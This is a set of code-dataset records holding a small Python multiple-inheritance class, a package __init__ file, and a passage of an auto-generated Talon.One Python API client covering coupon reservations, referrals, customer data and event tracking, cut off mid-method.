[
"Apache-2.0"
] | null | null | null |
oop/inheritance/email_enable_contact.py
|
erzhiqianyi/Design-Patterns-In-Python
|
2c4ab70963dc339361c7adc34317d0cb966710cc
|
[
"Apache-2.0"
] | null | null | null |
from oop.inheritance.contact import Contact
from oop.inheritance.mail_sender import MailSender
class EmailEnableContact(Contact, MailSender):
    """A contact that can also send mail.

    Combines ``Contact`` (contact data) with ``MailSender`` (mail-sending
    behavior) via multiple inheritance; adds no behavior of its own.
    """
    pass
| 19.25
| 50
| 0.824675
| 18
| 154
| 7
| 0.611111
| 0.111111
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123377
| 154
| 7
| 51
| 22
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
3ed17299106b02f3dab287aa9f81b7aa3ff40fe6
| 152
|
py
|
Python
|
datasets/__init__.py
|
RichardDominik/AICITY2021_Track2_DMT
|
50f27363532ae712868ff1ceaf128a3bbec426ac
|
[
"MIT"
] | 74
|
2021-04-19T03:09:45.000Z
|
2022-03-29T06:32:08.000Z
|
datasets/__init__.py
|
RichardDominik/AICITY2021_Track2_DMT
|
50f27363532ae712868ff1ceaf128a3bbec426ac
|
[
"MIT"
] | 16
|
2021-05-14T06:09:26.000Z
|
2022-02-23T20:08:27.000Z
|
datasets/__init__.py
|
RichardDominik/AICITY2021_Track2_DMT
|
50f27363532ae712868ff1ceaf128a3bbec426ac
|
[
"MIT"
] | 18
|
2021-05-10T02:17:01.000Z
|
2022-03-27T05:18:55.000Z
|
from .make_dataloader import make_dataloader,make_dataloader_Pseudo,get_trainloader_uda, get_testloader_uda
from .make_dataloader import RandomErasing
| 50.666667
| 108
| 0.901316
| 20
| 152
| 6.4
| 0.5
| 0.4375
| 0.28125
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065789
| 152
| 2
| 109
| 76
| 0.901408
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
4127e27c3fcd34e10592f3bcfdcdde379ec51d1d
| 93,016
|
py
|
Python
|
talon_one/api/integration_api.py
|
talon-one/talon_one.py
|
f863bb3c2cc5ddc94d9227adcf14947b2ea7db41
|
[
"MIT"
] | 1
|
2021-03-05T06:41:26.000Z
|
2021-03-05T06:41:26.000Z
|
talon_one/api/integration_api.py
|
talon-one/talon_one.py
|
f863bb3c2cc5ddc94d9227adcf14947b2ea7db41
|
[
"MIT"
] | 1
|
2021-09-07T08:56:58.000Z
|
2021-09-07T08:56:58.000Z
|
talon_one/api/integration_api.py
|
talon-one/talon_one.py
|
f863bb3c2cc5ddc94d9227adcf14947b2ea7db41
|
[
"MIT"
] | 1
|
2019-05-21T10:27:54.000Z
|
2019-05-21T10:27:54.000Z
|
# coding: utf-8
"""
Talon.One API
The Talon.One API is used to manage applications and campaigns, as well as to integrate with your application. The operations in the _Integration API_ section are used to integrate with our platform, while the other operations are used to manage applications and campaigns. ### Where is the API? The API is available at the same hostname as these docs. For example, if you are reading this page at `https://mycompany.talon.one/docs/api/`, the URL for the [updateCustomerProfile][] operation is `https://mycompany.talon.one/v1/customer_profiles/id` [updateCustomerProfile]: #operation--v1-customer_profiles--integrationId--put # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from talon_one.api_client import ApiClient
from talon_one.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class IntegrationApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_coupon_reservation(self, coupon_value, body, **kwargs): # noqa: E501
"""Create a new coupon reservation # noqa: E501
Creates a coupon reservation for all passed customer profiles on this couponID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_coupon_reservation(coupon_value, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str coupon_value: The value of a coupon (required)
:param CouponReservations body: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Coupon
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_coupon_reservation_with_http_info(coupon_value, body, **kwargs) # noqa: E501
    def create_coupon_reservation_with_http_info(self, coupon_value, body, **kwargs):  # noqa: E501
        """Create a new coupon reservation  # noqa: E501

        Creates a coupon reservation for all passed customer profiles on this couponID  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_coupon_reservation_with_http_info(coupon_value, body, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str coupon_value: The value of a coupon (required)
        :param CouponReservations body: (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(Coupon, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Snapshot the named arguments (includes 'self' and the raw 'kwargs'
        # dict); extra kwargs are validated and merged in below.
        local_var_params = locals()

        all_params = [
            'coupon_value',
            'body'
        ]
        all_params.extend(
            [
                'async_req',
                '_return_http_data_only',
                '_preload_content',
                '_request_timeout'
            ]
        )

        # Reject any keyword argument that is not a declared parameter.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method create_coupon_reservation" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'coupon_value' is set
        if self.api_client.client_side_validation and ('coupon_value' not in local_var_params or  # noqa: E501
                                                       local_var_params['coupon_value'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `coupon_value` when calling `create_coupon_reservation`")  # noqa: E501
        # verify the required parameter 'body' is set
        if self.api_client.client_side_validation and ('body' not in local_var_params or  # noqa: E501
                                                       local_var_params['body'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `body` when calling `create_coupon_reservation`")  # noqa: E501

        collection_formats = {}

        # Path template substitution: {couponValue} in the URL below.
        path_params = {}
        if 'coupon_value' in local_var_params:
            path_params['couponValue'] = local_var_params['coupon_value']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in local_var_params:
            body_params = local_var_params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['api_key_v1', 'integration_auth']  # noqa: E501

        return self.api_client.call_api(
            '/v1/coupon_reservations/{couponValue}', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='Coupon',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
def create_referral(self, body, **kwargs): # noqa: E501
"""Create a referral code for an advocate # noqa: E501
Creates a referral code for an advocate. The code will be valid for the referral campaign for which is created, indicated in the `campaignId` parameter, and will be associated with the profile specified in the `advocateProfileIntegrationId` parameter as the advocate's profile. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_referral(body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param NewReferral body: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Referral
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_referral_with_http_info(body, **kwargs) # noqa: E501
    def create_referral_with_http_info(self, body, **kwargs):  # noqa: E501
        """Create a referral code for an advocate  # noqa: E501

        Creates a referral code for an advocate. The code will be valid for the referral campaign for which is created, indicated in the `campaignId` parameter, and will be associated with the profile specified in the `advocateProfileIntegrationId` parameter as the advocate's profile.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_referral_with_http_info(body, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param NewReferral body: (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(Referral, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Snapshot the named arguments (includes 'self' and the raw 'kwargs'
        # dict); extra kwargs are validated and merged in below.
        local_var_params = locals()

        all_params = [
            'body'
        ]
        all_params.extend(
            [
                'async_req',
                '_return_http_data_only',
                '_preload_content',
                '_request_timeout'
            ]
        )

        # Reject any keyword argument that is not a declared parameter.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method create_referral" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'body' is set
        if self.api_client.client_side_validation and ('body' not in local_var_params or  # noqa: E501
                                                       local_var_params['body'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `body` when calling `create_referral`")  # noqa: E501

        collection_formats = {}

        # No path/template parameters for this endpoint.
        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in local_var_params:
            body_params = local_var_params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['api_key_v1', 'integration_auth']  # noqa: E501

        return self.api_client.call_api(
            '/v1/referrals', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='Referral',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
def delete_coupon_reservation(self, coupon_value, body, **kwargs): # noqa: E501
"""Delete coupon reservations # noqa: E501
Removes all passed customer profiles reservation from this coupon # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_coupon_reservation(coupon_value, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str coupon_value: The value of a coupon (required)
:param CouponReservations body: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_coupon_reservation_with_http_info(coupon_value, body, **kwargs) # noqa: E501
    def delete_coupon_reservation_with_http_info(self, coupon_value, body, **kwargs):  # noqa: E501
        """Delete coupon reservations  # noqa: E501

        Removes all passed customer profiles reservation from this coupon  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_coupon_reservation_with_http_info(coupon_value, body, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str coupon_value: The value of a coupon (required)
        :param CouponReservations body: (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Snapshot the named arguments (includes 'self' and the raw 'kwargs'
        # dict); extra kwargs are validated and merged in below.
        local_var_params = locals()

        all_params = [
            'coupon_value',
            'body'
        ]
        all_params.extend(
            [
                'async_req',
                '_return_http_data_only',
                '_preload_content',
                '_request_timeout'
            ]
        )

        # Reject any keyword argument that is not a declared parameter.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_coupon_reservation" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'coupon_value' is set
        if self.api_client.client_side_validation and ('coupon_value' not in local_var_params or  # noqa: E501
                                                       local_var_params['coupon_value'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `coupon_value` when calling `delete_coupon_reservation`")  # noqa: E501
        # verify the required parameter 'body' is set
        if self.api_client.client_side_validation and ('body' not in local_var_params or  # noqa: E501
                                                       local_var_params['body'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `body` when calling `delete_coupon_reservation`")  # noqa: E501

        collection_formats = {}

        # Path template substitution: {couponValue} in the URL below.
        path_params = {}
        if 'coupon_value' in local_var_params:
            path_params['couponValue'] = local_var_params['coupon_value']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in local_var_params:
            body_params = local_var_params['body']
        # HTTP header `Content-Type`
        # NOTE(review): unlike the sibling endpoints, no `Accept` header is set
        # here — the response carries no body (response_type=None below).
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['api_key_v1', 'integration_auth']  # noqa: E501

        return self.api_client.call_api(
            '/v1/coupon_reservations/{couponValue}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
def delete_customer_data(self, integration_id, **kwargs): # noqa: E501
"""Delete the personal data of a customer # noqa: E501
Delete all attributes on the customer profile and on entities that reference that customer profile. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_customer_data(integration_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str integration_id: The custom identifier for this profile, must be unique within the account. (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_customer_data_with_http_info(integration_id, **kwargs) # noqa: E501
    def delete_customer_data_with_http_info(self, integration_id, **kwargs):  # noqa: E501
        """Delete the personal data of a customer  # noqa: E501

        Delete all attributes on the customer profile and on entities that reference that customer profile.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.delete_customer_data_with_http_info(integration_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str integration_id: The custom identifier for this profile, must be unique within the account. (required)
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: None
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Snapshot the named arguments (includes 'self' and the raw 'kwargs'
        # dict); extra kwargs are validated and merged in below.
        local_var_params = locals()

        all_params = [
            'integration_id'
        ]
        all_params.extend(
            [
                'async_req',
                '_return_http_data_only',
                '_preload_content',
                '_request_timeout'
            ]
        )

        # Reject any keyword argument that is not a declared parameter.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_customer_data" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'integration_id' is set
        if self.api_client.client_side_validation and ('integration_id' not in local_var_params or  # noqa: E501
                                                       local_var_params['integration_id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `integration_id` when calling `delete_customer_data`")  # noqa: E501

        collection_formats = {}

        # Path template substitution: {integrationId} in the URL below.
        path_params = {}
        if 'integration_id' in local_var_params:
            path_params['integrationId'] = local_var_params['integration_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        # No request body for this endpoint.
        body_params = None
        # Authentication setting
        auth_settings = ['api_key_v1', 'integration_auth']  # noqa: E501

        return self.api_client.call_api(
            '/v1/customer_data/{integrationId}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type=None,  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_customer_inventory(self, integration_id, **kwargs): # noqa: E501
"""Get an inventory of all data associated with a specific customer profile # noqa: E501
Get information regarding entities referencing this customer profile's integrationId. Currently we support customer profile information, referral codes and reserved coupons. In the future, this will be expanded with loyalty points. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_customer_inventory(integration_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str integration_id: The custom identifier for this profile, must be unique within the account. (required)
:param bool profile: optional flag to decide if you would like customer profile information in the response
:param bool referrals: optional flag to decide if you would like referral information in the response
:param bool coupons: optional flag to decide if you would like coupon information in the response
:param bool loyalty: optional flag to decide if you would like loyalty information in the response
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: CustomerInventory
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_customer_inventory_with_http_info(integration_id, **kwargs) # noqa: E501
    def get_customer_inventory_with_http_info(self, integration_id, **kwargs):  # noqa: E501
        """Get an inventory of all data associated with a specific customer profile  # noqa: E501

        Get information regarding entities referencing this customer profile's integrationId. Currently we support customer profile information, referral codes and reserved coupons. In the future, this will be expanded with loyalty points.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_customer_inventory_with_http_info(integration_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool: execute request asynchronously
        :param str integration_id: The custom identifier for this profile, must be unique within the account. (required)
        :param bool profile: optional flag to decide if you would like customer profile information in the response
        :param bool referrals: optional flag to decide if you would like referral information in the response
        :param bool coupons: optional flag to decide if you would like coupon information in the response
        :param bool loyalty: optional flag to decide if you would like loyalty information in the response
        :param _return_http_data_only: response data without head status code
                                       and headers
        :param _preload_content: if False, the urllib3.HTTPResponse object will
                                 be returned without reading/decoding response
                                 data. Default is True.
        :param _request_timeout: timeout setting for this request. If one
                                 number provided, it will be total request
                                 timeout. It can also be a pair (tuple) of
                                 (connection, read) timeouts.
        :return: tuple(CustomerInventory, status_code(int), headers(HTTPHeaderDict))
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Snapshot the named arguments (includes 'self' and the raw 'kwargs'
        # dict); extra kwargs are validated and merged in below.
        local_var_params = locals()

        all_params = [
            'integration_id',
            'profile',
            'referrals',
            'coupons',
            'loyalty'
        ]
        all_params.extend(
            [
                'async_req',
                '_return_http_data_only',
                '_preload_content',
                '_request_timeout'
            ]
        )

        # Reject any keyword argument that is not a declared parameter.
        for key, val in six.iteritems(local_var_params['kwargs']):
            if key not in all_params:
                raise ApiTypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_customer_inventory" % key
                )
            local_var_params[key] = val
        del local_var_params['kwargs']
        # verify the required parameter 'integration_id' is set
        if self.api_client.client_side_validation and ('integration_id' not in local_var_params or  # noqa: E501
                                                       local_var_params['integration_id'] is None):  # noqa: E501
            raise ApiValueError("Missing the required parameter `integration_id` when calling `get_customer_inventory`")  # noqa: E501

        collection_formats = {}

        # Path template substitution: {integrationId} in the URL below.
        path_params = {}
        if 'integration_id' in local_var_params:
            path_params['integrationId'] = local_var_params['integration_id']  # noqa: E501

        # Only explicitly-passed, non-None flags become query parameters.
        query_params = []
        if 'profile' in local_var_params and local_var_params['profile'] is not None:  # noqa: E501
            query_params.append(('profile', local_var_params['profile']))  # noqa: E501
        if 'referrals' in local_var_params and local_var_params['referrals'] is not None:  # noqa: E501
            query_params.append(('referrals', local_var_params['referrals']))  # noqa: E501
        if 'coupons' in local_var_params and local_var_params['coupons'] is not None:  # noqa: E501
            query_params.append(('coupons', local_var_params['coupons']))  # noqa: E501
        if 'loyalty' in local_var_params and local_var_params['loyalty'] is not None:  # noqa: E501
            query_params.append(('loyalty', local_var_params['loyalty']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['api_key_v1', 'integration_auth']  # noqa: E501

        return self.api_client.call_api(
            '/v1/customer_profiles/{integrationId}/inventory', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='CustomerInventory',  # noqa: E501
            auth_settings=auth_settings,
            async_req=local_var_params.get('async_req'),
            _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
            _preload_content=local_var_params.get('_preload_content', True),
            _request_timeout=local_var_params.get('_request_timeout'),
            collection_formats=collection_formats)
def get_reserved_customers(self, coupon_value, **kwargs): # noqa: E501
"""Get the users that have this coupon reserved # noqa: E501
Returns all users that have this coupon marked as reserved # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_reserved_customers(coupon_value, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str coupon_value: The value of a coupon (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_reserved_customers_with_http_info(coupon_value, **kwargs) # noqa: E501
def get_reserved_customers_with_http_info(self, coupon_value, **kwargs):  # noqa: E501
    """Get the users that have this coupon reserved  # noqa: E501

    Returns all users that have this coupon marked as reserved.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_reserved_customers_with_http_info(coupon_value, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str coupon_value: The value of a coupon (required)
    :param _return_http_data_only: response data without head status code
        and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
        be returned without reading/decoding response data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
        number provided, it will be total request timeout. It can also be
        a pair (tuple) of (connection, read) timeouts.
    :return: tuple(InlineResponse200, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously,
        returns the request thread.
    """
    # Collect the explicit argument plus any recognised keyword options.
    local_var_params = {'coupon_value': coupon_value}
    recognized = [
        'coupon_value',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]
    for key, val in six.iteritems(kwargs):
        if key not in recognized:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_reserved_customers" % key
            )
        local_var_params[key] = val

    # The coupon value is a required path parameter.
    if self.api_client.client_side_validation and local_var_params.get('coupon_value') is None:  # noqa: E501
        raise ApiValueError("Missing the required parameter `coupon_value` when calling `get_reserved_customers`")  # noqa: E501

    collection_formats = {}

    path_params = {'couponValue': local_var_params['coupon_value']}  # noqa: E501
    query_params = []
    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(
            ['application/json']),  # noqa: E501
    }
    form_params = []
    local_var_files = {}
    body_params = None

    # Authentication setting
    auth_settings = ['api_key_v1', 'integration_auth']  # noqa: E501

    return self.api_client.call_api(
        '/v1/coupon_reservations/customerprofiles/{couponValue}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='InlineResponse200',  # noqa: E501
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def track_event(self, body, **kwargs):  # noqa: E501
    """Track an Event  # noqa: E501

    Records an arbitrary event in a customer session. For example, an
    integration might record an event when a user updates their payment
    information. The `sessionId` body parameter is required: an event is
    always part of a session. If either the profile or the session does
    not exist, a new empty one is created; an existing session must
    belong to the same `profileId` or an error is returned. An empty
    string for `profileId` indicates an anonymous session. The response
    contains the full integration state: the customer profile, the
    customer session, the recorded event, and the effects that took
    place.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.track_event(body, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param NewEvent body: (required)
    :param bool dry: Indicates whether to skip persisting the changes or not (Will not persist if set to 'true').
    :param _preload_content: if False, the urllib3.HTTPResponse object will
        be returned without reading/decoding response data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
        number provided, it will be total request timeout. It can also be
        a pair (tuple) of (connection, read) timeouts.
    :return: IntegrationState
        If the method is called asynchronously,
        returns the request thread.
    """
    # Force the data-only return form and delegate to the
    # *_with_http_info variant, which performs the actual request.
    options = dict(kwargs, _return_http_data_only=True)
    return self.track_event_with_http_info(body, **options)  # noqa: E501
def track_event_with_http_info(self, body, **kwargs):  # noqa: E501
    """Track an Event  # noqa: E501

    Records an arbitrary event in a customer session. For example, an
    integration might record an event when a user updates their payment
    information. The `sessionId` body parameter is required: an event is
    always part of a session. If either the profile or the session does
    not exist, a new empty one is created; an existing session must
    belong to the same `profileId` or an error is returned. An empty
    string for `profileId` indicates an anonymous session. The response
    contains the full integration state: the customer profile, the
    customer session, the recorded event, and the effects that took
    place.  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.track_event_with_http_info(body, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param NewEvent body: (required)
    :param bool dry: Indicates whether to skip persisting the changes or not (Will not persist if set to 'true').
    :param _return_http_data_only: response data without head status code
        and headers
    :param _preload_content: if False, the urllib3.HTTPResponse object will
        be returned without reading/decoding response data. Default is True.
    :param _request_timeout: timeout setting for this request. If one
        number provided, it will be total request timeout. It can also be
        a pair (tuple) of (connection, read) timeouts.
    :return: tuple(IntegrationState, status_code(int), headers(HTTPHeaderDict))
        If the method is called asynchronously,
        returns the request thread.
    """
    # Collect the explicit argument plus any recognised keyword options.
    local_var_params = {'body': body}
    recognized = [
        'body',
        'dry',
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
    ]
    for key, val in six.iteritems(kwargs):
        if key not in recognized:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method track_event" % key
            )
        local_var_params[key] = val

    # The request body is mandatory for this endpoint.
